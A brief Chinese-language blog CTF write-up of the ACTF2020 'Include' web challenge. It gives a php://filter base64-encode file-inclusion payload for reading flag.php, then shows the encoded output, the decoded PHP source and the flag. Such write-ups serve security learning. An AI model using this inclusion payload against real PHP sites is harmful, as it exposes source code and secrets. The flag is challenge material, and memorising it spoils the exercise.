博客
CTF Write Up
[ACTF2020 新生赛]Include

[ACTF2020 新生赛]Include

May 9, 2025

检查页面元素发现提示:<body><a href="?file=flag.php">tips</a></body>

利用 任意文件包含漏洞php 伪协议 读取 `flag.php

?file=php://filter/read=convert.base64-encode/resource=flag.php

进行 base64 解码,获得 flagflag{56a53bc6-5778-4ddb-bde2-a8a73ab475ad}

PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7NTZhNTNiYzYtNTc3OC00ZGRiLWJkZTItYThhNzNhYjQ3NWFkfQo=
<?php
echo "Can you find out the flag?";
//flag{56a53bc6-5778-4ddb-bde2-a8a73ab475ad}
[NISACTF 2022]easyssrf[第五空间 2021]WebFTP